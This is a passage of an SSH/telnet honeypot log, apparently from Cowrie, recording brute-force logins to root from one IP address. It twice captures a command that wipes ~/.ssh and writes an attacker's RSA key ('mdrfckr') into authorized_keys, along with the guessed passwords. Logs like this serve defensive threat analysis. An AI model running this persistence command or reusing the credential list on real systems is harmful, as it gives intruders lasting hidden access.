{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:32:10.159177Z","src_ip":"213.6.203.226","session":"0fa121f46ba0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:32:10.233188Z","src_ip":"213.6.203.226","session":"0fa121f46ba0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:32:10.571610Z","src_ip":"213.6.203.226","session":"0fa121f46ba0"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:32:10.642322Z","src_ip":"213.6.203.226","session":"746d2a5c361e"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:32:10.647205Z","src_ip":"213.6.203.226","session":"0fa121f46ba0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52122,"dst_ip":"1.2.3.4","dst_port":23,"session":"91f0d75ad257","protocol":"telnet","message":"New connection: 212.227.125.160:52122 (1.2.3.4:23) [session: 91f0d75ad257]","sensor":"my-vps","timestamp":"2025-09-09T05:32:36.500176Z"}
{"eventid":"cowrie.session.closed","duration":0.24458575248718262,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:32:36.744633Z","src_ip":"212.227.125.160","session":"91f0d75ad257"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59920,"dst_ip":"1.2.3.4","dst_port":23,"session":"1807c0cf6ac6","protocol":"telnet","message":"New connection: 212.227.235.229:59920 (1.2.3.4:23) [session: 1807c0cf6ac6]","sensor":"my-vps","timestamp":"2025-09-09T05:32:51.898405Z"}
{"eventid":"cowrie.session.closed","duration":0.27704954147338867,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:32:52.175390Z","src_ip":"212.227.235.229","session":"1807c0cf6ac6"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":49412,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cb2269f2cf6","protocol":"ssh","message":"New connection: 213.6.203.226:49412 (1.2.3.4:22) [session: 3cb2269f2cf6]","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.011190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.012645Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.080269Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.login.success","username":"root","password":"Temp123!","message":"login attempt [root/Temp123!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.391980Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:33:12.589302Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.590090Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.590950Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.660100Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:33:12.812275Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.812948Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.890110Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.891020Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":36185,"dst_ip":"1.2.3.4","dst_port":22,"session":"87da3b32dd10","protocol":"ssh","message":"New connection: 213.6.203.226:36185 (1.2.3.4:22) [session: 87da3b32dd10]","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.956471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:33:12.957089Z","src_ip":"213.6.203.226","session":"87da3b32dd10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:33:13.024982Z","src_ip":"213.6.203.226","session":"87da3b32dd10"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:33:13.350281Z","src_ip":"213.6.203.226","session":"87da3b32dd10"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:33:14.420379Z","src_ip":"213.6.203.226","session":"87da3b32dd10"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":46449,"dst_ip":"1.2.3.4","dst_port":22,"session":"c428016017bf","protocol":"ssh","message":"New connection: 213.6.203.226:46449 (1.2.3.4:22) [session: c428016017bf]","sensor":"my-vps","timestamp":"2025-09-09T05:33:14.488388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:33:14.489223Z","src_ip":"213.6.203.226","session":"c428016017bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:33:14.556707Z","src_ip":"213.6.203.226","session":"c428016017bf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:33:14.869114Z","src_ip":"213.6.203.226","session":"c428016017bf"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:33:14.937860Z","src_ip":"213.6.203.226","session":"c428016017bf"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:33:14.940435Z","src_ip":"213.6.203.226","session":"3cb2269f2cf6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63770,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc55ec18c6c2","protocol":"ssh","message":"New connection: 217.72.205.35:63770 (1.2.3.4:22) [session: dc55ec18c6c2]","sensor":"my-vps","timestamp":"2025-09-09T05:34:10.417096Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:10.418122Z","src_ip":"217.72.205.35","session":"dc55ec18c6c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":56497,"dst_ip":"1.2.3.4","dst_port":22,"session":"c27af2ac40e7","protocol":"ssh","message":"New connection: 213.6.203.226:56497 (1.2.3.4:22) [session: c27af2ac40e7]","sensor":"my-vps","timestamp":"2025-09-09T05:34:19.517177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:34:19.518223Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:34:19.584889Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.login.success","username":"root","password":"fghjkl","message":"login attempt [root/fghjkl] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:34:19.898720Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:34:20.091508Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.092164Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.093017Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.160746Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:34:20.313680Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.314358Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.385412Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.386258Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":49111,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f27099492f5","protocol":"ssh","message":"New connection: 213.6.203.226:49111 (1.2.3.4:22) [session: 3f27099492f5]","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.453667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.454349Z","src_ip":"213.6.203.226","session":"3f27099492f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.526031Z","src_ip":"213.6.203.226","session":"3f27099492f5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:34:20.848710Z","src_ip":"213.6.203.226","session":"3f27099492f5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:21.918576Z","src_ip":"213.6.203.226","session":"3f27099492f5"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":43551,"dst_ip":"1.2.3.4","dst_port":22,"session":"718a5ca24a77","protocol":"ssh","message":"New connection: 213.6.203.226:43551 (1.2.3.4:22) [session: 718a5ca24a77]","sensor":"my-vps","timestamp":"2025-09-09T05:34:21.985343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:34:21.986224Z","src_ip":"213.6.203.226","session":"718a5ca24a77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 